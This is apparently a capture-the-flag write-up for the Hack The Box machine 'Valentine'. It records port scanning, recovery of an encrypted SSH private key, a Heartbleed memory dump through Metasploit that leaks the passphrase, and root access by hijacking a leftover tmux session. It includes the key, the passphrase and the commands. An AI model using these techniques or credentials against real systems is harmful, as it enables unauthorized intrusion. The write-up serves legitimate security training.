Valentine

Created At: Updated At:

Recon

No domain this time.

$nmap -p- -A 10.129.168.63
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 09:20 UTC
Nmap scan report for 10.129.168.63
Host is up (0.053s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_ssl-date: 2024-10-12T09:20:50+00:00; -5s from scanner time.
|_http-server-header: Apache/2.2.22 (Ubuntu)
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Running with --script vuln, shows that we can use heartbleed attack.

dirsearch -u http://10.129.168.63/
[09:22:48] 403 -  243B  - /.ht_wsr.txt
[09:22:48] 403 -  243B  - /.htaccess.sample
[09:22:48] 403 -  243B  - /.htaccess_orig
[09:22:48] 403 -  242B  - /.htaccess_sc
[09:22:48] 403 -  241B  - /.htaccessBAK
[09:22:48] 403 -  241B  - /.htaccessOLD2
[09:22:48] 403 -  242B  - /.htaccess.bak1
[09:22:48] 403 -  242B  - /.htaccess.orig
[09:22:48] 403 -  244B  - /.htaccess_extra
[09:22:48] 403 -  241B  - /.htaccessOLD
[09:22:48] 403 -  241B  - /.htaccess.save
[09:22:49] 403 -  237B  - /.htm
[09:22:49] 403 -  237B  - /.html
[09:22:49] 403 -  246B  - /.htpasswd_test
[09:22:49] 403 -  241B  - /.htpasswds
[09:22:49] 403 -  241B  - /.httr-oauth
[09:22:59] 403 -  241B  - /cgi-bin/
[09:23:03] 301 -  245B  - /dev  ->  http://10.129.168.63/dev/  (!)
[09:23:03] 200 -  493B  - /dev/
[09:23:03] 403 -  237B  - /doc/
[09:23:03] 403 -  244B  - /doc/stable.version
[09:23:03] 403 -  245B  - /doc/html/index.html
[09:23:03] 403 -  240B  - /doc/api/
[09:23:03] 403 -  247B  - /doc/en/changes.html
[09:23:16] 403 -  240B  - /server-status/
[09:23:16] 403 -  240B  - /server-status

Notes.txt:

To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

Ok, so we can assume that in this box we will abuse server-side encoding.

Hype key is something in hex:

Decoding it in cybercheff we get:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----

Trying to log in with this key, we get a prompt asking for passphrase. Lets try the hearthbleed attack.

Running the hearthbleed attack from metasploit (and setting the action to DUMP) we get:

Decoding from base64 we get: heartbleedbelievethehype.

Now we can log in using the ssh to user hype.
One thing that is config specific. I had to enable rsa logging in, as it was disabled by default. To do so, add to ~/.ssh/config:

Host *
    PubkeyAcceptedKeyTypes=+ssh-rsa
    HostKeyAlgorithms=+ssh-rsa

We are in.

Priv esc

Running linenum shows us that we have access to user history.

exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess 
tmux a -t dev_sess 
tmux --help
tmux -S /.devs/dev_sess 
exit

running tmux -S /.devs/dev_sess , gets us last users session. It’s root. Nice.